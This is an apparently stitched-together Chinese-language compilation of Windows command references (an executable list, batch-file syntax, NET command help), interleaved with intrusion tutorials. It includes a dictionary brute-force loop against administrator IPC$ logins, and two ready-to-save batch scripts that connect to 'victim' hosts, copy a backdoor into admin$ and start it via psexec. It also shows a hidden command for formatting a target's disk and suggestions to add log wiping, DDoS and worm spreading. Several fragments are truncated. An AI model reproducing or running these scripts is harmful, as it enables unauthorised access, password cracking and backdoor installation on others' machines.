2.其他更多Windows命令 accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导
acsetups.exe > ACS setup DCOM server executable
actmovie.exe > Direct Show setup tool 直接显示安装工具
append.exe > Allows programs to open data in specified directories as if they were in the current directory. 允许程序打开制定目录中的数据
arp.exe > NETWORK Display and modify IP - Hardware addresses 显示和更改计算机的IP与硬件物理地址的对应列表
at.exe > AT is a scheduling utility also included with UNIX 计划运行任务
atmadm.exe > Displays statistics for ATM call manager. ATM调用管理器统计
attrib.exe > Display and modify attributes for files and folders 显示和更改文件和文件夹属性
autochk.exe > Used to check and repair Windows File Systems 检测修复文件系统
autoconv.exe > Automates the file system conversion during reboots 在启动过程中自动转化系统
autofmt.exe > Automates the file format process during reboots 在启动过程中格式化进程
autolfn.exe > Used for formatting long file names 使用长文件名格式
bootok.exe > Boot acceptance application for registry
bootvrfy.exe > Bootvrfy.exe, a program included in Windows 2000 that notifies the system that startup was successful. Bootvrfy.exe can be run on a local or remote computer. 通报启动成功 cacls.exe > Displays or modifies access control lists (ACLs) of files. 显示和编辑ACL
calc.exe > Windows Calculators 计算器
cdplayer.exe > Windows CD Player CD播放器
change.exe > Change { User │ Port │ Logon } 与终端服务器相关的查询
charmap.exe > Character Map 字符映射表
chglogon.exe > Same as using "Change Logon" 启动或停用会话记录
chgport.exe > Same as using "Change Port" 改变端口(终端服务)
chgusr.exe > Same as using "Change User" 改变用户(终端服务)
chkdsk.exe > Check the hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter 磁盘检测程序
chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盘检测程序
cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务
cipher.exe > Displays or alters the encryption of directories [files] on NTFS partitions. 在NTFS上显示或改变加密的文件或目录
cisvc.exe > Content Index -- It's the content indexing service for I 索引内容
ckcnv.exe > Cookie Convertor 变换Cookie
cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盘清理
cliconfg.exe > SQL Server Client Network Utility SQL客户网络工具
clipbrd.exe > Clipboard viewer for Local will allow you to connect to other clipboards 剪贴簿查看器
clipsrv.exe > Start the clipboard Server 运行Clipboard服务
clspack.exe > CLSPACK used to create a file listing of system packages 建立系统文件列表清单
cluster.exe > Display a cluster in a domain 显示域的集群
1、Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on│off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)
3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label (label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。
4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 Rem Message Sample:@Rem Here is the description.
5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:\back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。
7.start 命令 调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: test.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag (应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end
:defrag c:\dos\defrag goto end :mem mem goto end :end echo good bye
此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。
9.If 命令
if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式: 1、if "参数" == "字符串" 待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms
FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command
或者,如果有 usebackq 选项:
FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command
利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"│find ":命令成功完成">>D:\ok.txt ,这样就ko了。
主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call cultivate.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给cultivate.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim并用返回码(If errorlever =)来筛选成功种植后门的主机并echo出来,或者echo到文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来,一般就是 ip password username。
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \\%1\ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @p***ec \\%1 c:\winnt\system32\windrv32.exe @p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究
那么如何应用这些命令提高效率呢?下面我举一个例子,如何利用fttp进行 后台下载,假设你的ISP给你提供了shell并且可以用nohup,你想由fttp.downlo ad.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下: 1.用notepad做一个文件如aaa1内容如下 open ftp.dwonload.com user an onymous zyz@cenpok.net cd /pub/internet/ i get aaa.zip close bye 2.拨号登录到你的ISP上。 用telnet 或netterm登录到shell,一般都在你的home子目录里bbs~/ 3.用fttp上传aaa1到ISP服务器你的子目录。 4. 执行nohup fttp -invd aaa2& 这样这个进程就被放在ISP服务器的后台进行了, 如果你想知道情况如何,可以more aaa2就可以知道情况如何了。这时你可以断线了或干点别的, 估计时间到了(time约=30M/(33.6K/9)s)拨号上去,more aaa2如果显示成功下载aaa.zip, 就表示aaa.zip已经被下载到ISP的服务器上了,你再由ISP的服务器拉回来就相当与点对点了, 记得下载完成后del掉你的文件(aaa.zip),免得浪费ISP资源,它会关掉shell的。
Pinging TBid.mshome.net [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<10ms TTL=64 Reply from 127.0.0.1: bytes=32 time<10ms TTL=64 Reply from 127.0.0.1: bytes=32 time<10ms TTL=64 Reply from 127.0.0.1: bytes=32 time<10ms TTL=64
Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。
3 查看远程主机的当前时间 命令: net time \\ip 解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT) 命令:nbtstat -A ip 用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status --------------------------------------------- SERVER <00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H <1C> GROUP Registered SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered INet~Services <1C> GROUP Registered IS~SERVER......<00> UNIQUE Registered
14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功,可是 net use i: \\1
net命令
许多 Windows NT 网络命令以 net 开始。这些 net 命令有一些公共属性: 通过键入 net /? 可查阅所有可用的 net 命令。 通过键入 net help 命令可在命令行中获得 net 命令的语法帮助。例如,要得到 net acco unts 命令的帮助,请键入 net help accounts。 所有 net 命令接受选项 / yes 和 /no(可缩写为 / y 和 /n )。/ y 对命令产生的任何交 互提示自动回答“是”,/n 回答“否”。例如,net stop server 通常提示确认是否根据服 务器服务结束所有服务,net stop server /y 自动回答“是”并关闭服务器服务。
Net Accounts
更新用户帐号数据库、更改密码及所有帐号的登录要求。必须要在更改帐号参数的计算机上 运行网络登录服务。 net accounts [/forcelogoff:{minutes │ no}] [/minpwlen:length] [/maxpwage:{days │ unlimited}] [/minpwage:days] [/uniquepw:number] [/domain] net accounts [/sync] [/domain] 参数 无 键入不带参数的 net accounts,将显示当前密码设置、登录时限及域信息。 /forcelogoff:{minutes │ no} 设置当用户帐号或有效登录时间过期时,结束用户和服务器会话前的等待时间。no 选项禁止 强行注销。该参数的默认设置为 no。 指定 /forcelogoff:minutes 之后,Windows NT 在其强制用户退出网络 minutes 分钟之前 ,将给用户发出警报。如果还有打开的文件,Windows NT 将警告用户。如果 minutes 小于 两分钟,Windows NT 警告用户立即从网络注销。 /minpwlen:length 设置用户帐号密码的最少字符数。允许范围是 0-14,默认值为 6。 /maxpwage:{days │ unlimited} 设置用户帐号密码有效的最大天数。unlimited 不设置最大天数。/maxpwage 选项的天数必 须大于 /minpwage。允许范围是 1-49,710 天 (unlimited)。默认值为 90 天。 /minpwage:days 设置用户必须保持原密码的最小天数。 0 值不设置最小时间。允许范围是 0-49,710 天,默 认值为 0 天。 /uniquepw:number 要求用户更改密码时,必须在经过 number 次后,才能重复使用与之相同的密码。允许范围 是 0-8。默认值为 5。 /domain 在当前域的主域控制器上执行该操作。否则只在本地计算机执行操作。 该参数仅用于 Windows NT Server 域中的 Windows NT Workstation 计算机,Windows NT Server 计算机默认为在主域控制器执行操作。 /sync 当用于主域控制器时,该命令使域中所有备份域控制器同步;当用于备份域控制器时,该命 令仅使该备份域控制器与主域控制器同步。该命令仅适用于 Windows NT Server 域成员的计 算机。
Net Computer
从域数据库中添加或删除计算机。该命令仅在运行 Windows NT Server 的计算机上可用。 net computer \computername {/add │ /del} 参数 \computername 指定要添加到域或从域中删除的计算机。 /add 将指定计算机添加到域。 /del 将指定计算机从域中删除。
Net Config
显示当前运行的可配置服务,或显示并更改某项服务的设置。 net config [service [options]] 参数 无 键入不带参数的 net config 将显示可配置服务的列表。 service 通过 net config 命令进行配置的服务(server 或 workstation)。 options 服务的特定选项。完整语法请参阅 net config server 或 net config workstation。
Net Config Server
运行服务时显示或更改服务器的服务设置。 net config server [/autodisconnect:time] [/srvcomment:"text "] [/hidden:{yes │ n o}] 参数 无 键入不带参数的 net config server,将显示服务器服务的当前配置。 /autodisconnect:time 设置断开前用户会话闲置的最大时间值。可以指定 -1,表示永不断开连接。允许范围是 -1 -65535 分钟,默认值是 15 分钟。 /srvcomment:"text " 为服务器添加注释,可以通过 net view 命令在屏幕上显示所加注释。注释最多可达 48 个 字符,文字要用引号引住。 /hidden:{yes │ no} 指定服务器的计算机名是否出现在服务器列表中。请注意隐含某个服务器并不改变该服务器 的权限。默认为 no。
Net Config Workstation
服务运行时,显示或更改工作站各项服务的设置。 net config workstation [/charcount:bytes] [/chartime:msec] [/charwait:sec] 参数 无 键入不带参数的 net config workstation 将显示本地计算机的当前配置。 /charcount:bytes 指定 Windows NT 在将数据发送到通讯设备之前收集的数据量。如果同时设置 /chartime:m sec 参数,Windows NT 按首先满足条件的选项运行。允许范围是 0-65535 字节,默认值是 16 字节。 /chartime:msec 指定 Windows NT 在将数据发送到通讯设备之前收集数据的时间。如果同时设置 /charcoun t:bytes 参数,Windows NT 按首先满足条件的选项运行。允许范围是 0-65535000 毫秒,默 认值是 250 毫秒。 /charwait:sec 设置 Windows NT 等待通讯设备变为可用的时间。允许的范围是 0-65535 秒,默认值是 36 00 秒。
Net Continue
重新激活挂起的服务。 net continue service 参数 service 能够继续运行的服务,包括: file server for macintosh(该服务仅限于 Windows NT Se rver), ftp publishing service, lpdsvc, net logon, network dde,network dde dsdm ,nt lm security support provider,remoteboot(该服务仅限于 Windows NT Server), remote access server, schedule,server,simple tcp/ip services 及 workstation 。
Net File
显示某服务器上所有打开的共享文件名及锁定文件数。该命令也可以关闭个别文件并取消文 件锁定。 net file [id [/close]] 参数 无 键入不带参数的 net file 可获得服务器上打开文件的列表。 id 文件标识号。 /close 关闭打开的文件并释放锁定记录。请从共享文件的服务器中键入该命令。
Net Group
在 Windows NT Server 域中添加、显示或更改全局组。该命令仅在 Windows NT Server 域 中可用。 net group [groupname [/comment:"text "]] [/domain] net group groupname {/add [/comment:"text "] │ /delete} [/domain] net group groupname username [ ...] {/add │ /delete} [/domain]
参数 无 键入不带参数的 net group 可以显示服务器名称及服务器的组名称。 groupname 要添加、扩展或删除的组。仅提供某个组名便可查看组中的用户列表。 /comment:"text " 为新建组或现有组添加注释。注释最多可以是 48 个字符,并用引号将注释文字引住。 /domain 在当前域的主域控制器中执行该操作,否则在本地计算机上执行操作。 该参数仅用于作为 Windows NT Server 域成员的 Windows NT Workstation 计算机。Windo ws NT Server 计算机默认为在主域控制器中操作。 username[ ...] 列表显示要添加到组或从组中删除的一个或多个用户。使用空格分隔多个用户名称项。 /add 添加组或在组中添加用户名。必须使用该命令为添加到组中的用户建立帐号。 /delete 删除组或从组中删除用户名。
Net Help
提供网络命令列表及帮助主题,或提供指定命令或主题的帮助。可用网络命令列于 N 下面的 “命令参考”中“命令”窗口内。 net help [command] net command {/help │ /?} 参数 无 键入不带参数的 net help 显示能够获得帮助的命令列表和帮助主题。 command 需要其帮助的命令,不要将 net 作为 command 的一部分。 /help 提供显示帮助文本方式选择。 /? 显示命令的正确语法。
Net Helpmsg
提供 Windows NT 错误信息的帮助。 net helpmsg message# 参数 message# 需要其帮助的 Windows NT 消息的四位代码。
Net Localgroup
添加、显示或更改本地组。 net localgroup [groupname [/comment:"text "]] [/domain] net localgroup groupname {/add [/comment:"text "] │ /delete} [/domain] net localgroup groupname name [ ...] {/add │ /delete} [/domain] 参数 无 键入不带参数的 net localgroup 将显示服务器名称和计算机的本地组名称。 groupname 要添加、扩充或删除的本地组名称。只提供 groupname 即可查看用户列表或本地组中的全局 组。 /comment: "text " 为新建或现有组添加注释。注释文字的最大长度是 48 个字符,并用引号引住。 /domain 在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作。 该参数仅应用于 Windows NT Server 域中的 Windows NT Workstation 计算机。Windows N T Server 计算机默认为在主域控制器中操作。 name [ ...] 列出要添加到本地组或从本地组中删除的一个或多个用户名或组名,多个用户名或组名之间 以空格分隔。可以是本地用户、其他域用户或全局组,但不能是其他本地组。如果是其他域 的用户,要在用户名前加域名(例如,SALESRALPHR)。 /add 将全局组名或用户名添加到本地组中。在使用该命令将用户或全局组添加到本地组之前,必 须为其建立帐号。 /delete 从本地组中删除组名或用户名。
Net Name
添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。要使用 net nam e 命令,计算机中必须运行信使服务。 net name [name [/add │ /delete]] 参数 无 键入不带参数的 net name 将列出当前使用的名称。 name 指定接收消息的名称。名称最多为 15 个字符。 /add 将名称添加到计算机中。 /add 是可选项,键入 net name name 与键入 net name name /a dd 相同。 /delete 从计算机中删除名称。
Net Pause
暂停正在运行的服务。 net pause service 参数 service 指下列服务: file server for macintosh(仅限于 Windows NT Server)、ftp publishi ng service、lpdsvc、net logon、network dde、network dde dsdm、nt lm security sup port provider、remoteboot(仅限于 Windows NT Server)、remote access server、sch edule、server、simple tcp/ip services 或 workstation 。
列出或断开本地计算机和与之连接的客户端的会话。 net session [\computername] [/delete] 参数 无 键入不带参数的 net session 可以显示所有与本地计算机的会话的信息。 \computername 标识要列出或断开会话的计算机。 /delete 结束与 \computername 计算机会话并关闭本次会话期间计算机的所有打开文件。如果省略 \computername 参数,将取消与本地计算机的所有会话。
Net Share
创建、删除或显示共享资源。 net share sharename net share sharename=drive:path [/users:number │ /unlimited] [/remark:"text"] net share sharename [/users:number │ unlimited] [/remark:"text"] net share {sharename │ drive:path} /delete 参数 无 键入不带参数的 net share 将显示本地计算机上所有共享资源的信息。 sharename 是共享资源的网络名称。键入带 sharename 的 net share 命令,只显示该共享信息。 drive:path 指定共享目录的绝对路径。 /users:number 设置可同时访问共享资源的最大用户数。 /unlimited 不限制同时访问共享资源的用户数。 /remark:"text " 添加关于资源的注释,注释文字用引号引住。 /delete 停止共享资源。
Net Start
启动服务,或显示已启动服务的列表。如果服务名是两个或两个以上的词,如 Net Logon 或 Computer Browser,则必须用引号 (") 引住。. net start [service] 参数 无 键入不带参数的 net start 则显示运行服务的列表。 service 包括下列服务: alerter、client service for netware、clipbook server、computer br owser、dhcp client 、directory replicator 、eventlog 、ftp publishing service 、 lpdsvc、messenger 、net logon 、network dde 、network dde dsdm 、network monitor ing agent 、nt lm security support provider 、ole 、remote access connection man ager 、remote access isnsap service 、remote access server 、remote procedure ca ll (rpc) locator 、remote procedure call (rpc) service 、schedule 、server 、sim ple tcp/ip services 、snmp、spooler 、tcp/ip netbios helper 、ups 及 workstation 。 下列服务仅在 Windows NT Server 下可用:file server for macintosh、gateway servic e for netware、microsoft dhcp server、print server for macintosh、remoteboot、wi ndows internet name service 。
Net Statistics
显示本地工作站或服务器服务的统计记录。 net statistics [workstation │ server] 参数 无 键入不带参数的 net statistics 将列出其统计信息可用的运行服务。 workstation 显示本地工作站服务的统计信息。 server 显示本地服务器服务的统计信息。
Net Stop
停止 Windows NT 网络服务。 net stop service 参数 service 包括下列服务: alerter(警报)、client service for netware(Netware 客户端服务) 、clipbook server(剪贴簿服务器)、computer browser(计算机浏览器)、directory r eplicator(目录复制器)、ftp publishing service (ftp )(ftp 发行服务)、lpdsvc、 messenger(信使)、net logon(网络登录)、network dde(网络 dde)、network dde d sdm(网络 dde dsdm)、network monitor agent(网络监控代理)、nt lm security supp ort provider(NT LM 安全性支持提供)、ole(对象链接与嵌入)、remote access conne ction manager(远程访问连接管理器)、remote access isnsap service(远程访问 isns ap 服务)、remote access server(远程访问服务器)、remote procedure call (rpc) l ocator(远程过程调用定位器)、remote procedure call (rpc) service(远程过程调用服 务)、schedule(调度)、server(服务器)、simple tcp/ip services(简单 TCP/IP 服 务)、snmp、spooler(后台打印程序)、tcp/ip netbios helper(TCP/IP NETBIOS 辅助工 具)、ups 及 workstation(工作站)。 下列服务仅在 Windows NT Server 中可用: file server for macintosh、gateway servi ce for netware、microsoft dhcp server、print server for macintosh、remoteboot、w indows internet name service。
Net Time
使计算机的时钟与另一台计算机或域的时间同步。不带 /set 参数使用时,将显示另一台计 算机或域的时间。 net time [\computername │ /domain[:name]] [/set] 参数 \computername 要检查或同步的服务器名。 /domain[:name] 指定要与其时间同步的域。 /set 使本计算机时钟与指定计算机或域的时钟同步。
Net Use
连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。该命令也控制永久 网络连接。 net use [devicename │ *] [\computernamesharename[volume]] [password │ *]] [/user :[domainname]username] [[/delete] │ [/persistent:{yes │ no}]] net use devicename [/home[password │ *]] [/delete:{yes │ no}] net use [/persistent:{yes │ no}] 参数 无 键入不带参数的 net use 将列出网络连接。 devicename 指定要连接到的资源名称或要断开的设备名称。有两类设备名:磁盘驱动器(D: 到 Z:)和 打印机(LPT1: 到 LPT3)。若键入星号而不是指定设备名将分配下一个可用设备名。 \computernamesharename 服务器及共享资源的名称。如果计算机名包含空白字符,要用引号 (" ") 将双反斜线及计算 机名引住。计算机名长度可以是 1-15 个字符。 volume 指定服务器上的 NetWare 卷。要连接到 NetWare 服务器,必须安装并运行 NetWare 客户机 服务 (Windows NT Workstation) 或 NetWare 网关服务 (Windows NT Server)。 password 访问共享资源的密码。 * 提示键入密码。在密码提示行中键入密码时,将不显示该密码。 /user 指定进行连接的另外一个用户。 domainname 指定另一个域。例如 net use d: \servershare /user:adminmariel 连接用户 mariel,如 同从 admin 域连接一样。如果省略域,将使用当前登录域。 username 指定登录的用户名。 /home 将用户连接到其宿主目录。 /delete 取消指定网络连接。如果用户以星号指定连接,则取消所有网络连接。 /persistent 控制永久网络连接的使用。默认为上次使用的设置。无设备的连接不是永久的。 yes 保存建立的所有连接,并在下次登录时还原。 no 不保存建立的连接和继发连接,并在下次登录时还原现有连接。使用 /delete 开关项取消永 久连接。